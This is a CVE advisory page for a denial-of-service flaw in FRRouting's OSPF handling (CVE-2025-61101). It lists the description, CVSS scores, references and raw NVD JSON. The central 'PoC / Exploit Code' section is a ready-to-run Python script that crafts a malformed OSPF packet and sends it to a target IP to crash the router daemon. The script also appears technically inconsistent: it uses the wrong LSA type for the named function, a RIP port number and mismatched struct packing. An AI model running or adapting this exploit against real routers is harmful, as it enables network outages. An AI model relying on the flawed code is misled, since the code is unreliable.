CVE-2025-61101

Description

FRRouting/frr from v4.0 through v10.4.1 was discovered to contain a NULL pointer dereference via the show_vty_ext_link_rmt_itf_addr function at ospf_ext.c. This vulnerability allows attackers to cause a Denial of Service (DoS) via a crafted OSPF packet.

CVSS Details

CVSS Score

7.5

Severity

HIGH

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H

Configurations (Affected Products)

cpe:2.3:a:frrouting:frrouting:*:*:*:*:*:*:*:* - VULNERABLE

FRRouting/frr v4.0 到 v10.4.1

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

import socket
import struct
import sys

# OSPF Header Structure
def build_ospf_header(ospf_type, payload):
    version = 2  # OSPFv2
    msg_type = ospf_type
    length = 24 + len(payload)  # OSPF header (24 bytes) + payload
    router_id = b'\xc0\xa8\x01\x01'  # Attacker's router ID
    area_id = b'\xc0\xa8\x01\x00'  # Area ID
    checksum = 0
    auth_type = 0
    auth = b'\x00' * 8
    
    header = struct.pack('!BBHIIIIHH', 
        version, msg_type, length, 
        router_id[0]*256+router_id[1],
        router_id[2]*256+router_id[3],
        area_id[0]*256+area_id[1],
        area_id[2]*256+area_id[3],
        checksum, auth_type)
    header += auth
    return header

# Build malformed OSPF External LSA to trigger NULL pointer dereference
def build_malformed_external_lsa():
    # LSA header
    ls_age = 1
    options = 0x22
    ls_type = 5  # AS-External LSA
    link_state_id = 1
    advertising_router = struct.pack('!I', 0xC0A80102)
    ls_sequence = 0x80000001
    ls_checksum = 0
    length = 36 + 20  # header + external link data
    
    lsa_header = struct.pack('!HHIII', ls_age, options, ls_type, link_state_id, advertising_router[0]*256+advertising_router[1])
    lsa_header += struct.pack('!II', advertising_router[2]*256+advertising_router[3], ls_sequence)
    lsa_header += struct.pack('!HH', ls_checksum, length)
    
    # Malformed external link data to trigger NULL pointer in show_vty_ext_link_rmt_itf_addr
    # Set network mask to 0 and external route type to cause NULL pointer dereference
    network_mask = b'\x00\x00\x00\x00'  # NULL mask to trigger vulnerability
    ebit_tos = 0x80  # E-bit set
    metric = struct.pack('!I', 1)
    forwarding_address = b'\x00\x00\x00\x00'  # NULL forwarding address
    external_route_tag = struct.pack('!I', 0)
    
    payload = network_mask + struct.pack('!B', ebit_tos) + metric + forwarding_address + external_route_tag
    return lsa_header + payload

def exploit(target_ip, target_port=520):
    sock = socket.socket(socket.AF_INET, socket.SOCK_RAW, 89)  # OSPF protocol
    sock.setsockopt(socket.SOL_IP, socket.IP_HDRINCL, 1)
    
    lsa_payload = build_malformed_external_lsa()
    ospf_header = build_ospf_header(4, lsa_payload)  # Type 4: LSA Update
    
    packet = ospf_header + lsa_payload
    
    print(f'[+] Sending malicious OSPF packet to {target_ip}')
    sock.sendto(packet, (target_ip, target_port))
    print('[+] Packet sent. Target may crash due to NULL pointer dereference.')
    sock.close()

if __name__ == '__main__':
    if len(sys.argv) < 2:
        print(f'Usage: {sys.argv[0]} <target_ip>')
        sys.exit(1)
    exploit(sys.argv[1])

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2025-61101
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2025-61101
[3] CVE Details https://www.cvedetails.com/cve/CVE-2025-61101/
[4] VulDB https://vuldb.com/cve/CVE-2025-61101
[5] https://github.com/FRRouting/frr/issues/19471
[6] https://github.com/FRRouting/frr/pull/19480
[7] https://github.com/FRRouting/frr/pull/19480/commits/fdd957408605d4a1766225630aafc7e6b7c3daf3
[8] https://github.com/s1awwhy/BugList/blob/main/CVE-2025-61101.md

Raw JSON Data

JSON

{"cve": {"id": "CVE-2025-61101", "sourceIdentifier": "[email protected]", "published": "2025-10-27T20:15:54.050", "lastModified": "2025-11-03T17:53:25.543", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "FRRouting/frr from v4.0 through v10.4.1 was discovered to contain a NULL pointer dereference via the show_vty_ext_link_rmt_itf_addr function at ospf_ext.c. This vulnerability allows attackers to cause a Denial of Service (DoS) via a crafted OSPF packet."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "baseScore": 7.5, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.9, "impactScore": 3.6}]}, "weaknesses": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-476"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:frrouting:frrouting:*:*:*:*:*:*:*:*", "versionStartIncluding": "4.0", "versionEndIncluding": "10.4.1", "matchCriteriaId": "B41245C0-85A2-4A77-BF46-27F573E6F588"}]}]}], "references": [{"url": "https://github.com/FRRouting/frr/issues/19471", "source": "[email protected]", "tags": ["Exploit", "Issue Tracking", "Third Party Advisory"]}, {"url": "https://github.com/FRRouting/frr/pull/19480", "source": "[email protected]", "tags": ["Issue Tracking", "Third Party Advisory"]}, {"url": "https://github.com/FRRouting/frr/pull/19480/commits/fdd957408605d4a1766225630aafc7e6b7c3daf3", "source": "[email protected]", "tags": ["Patch"]}, {"url": "https://github.com/s1awwhy/BugList/blob/main/CVE-2025-61101.md", "source": "[email protected]", "tags": ["Third Party Advisory"]}]}}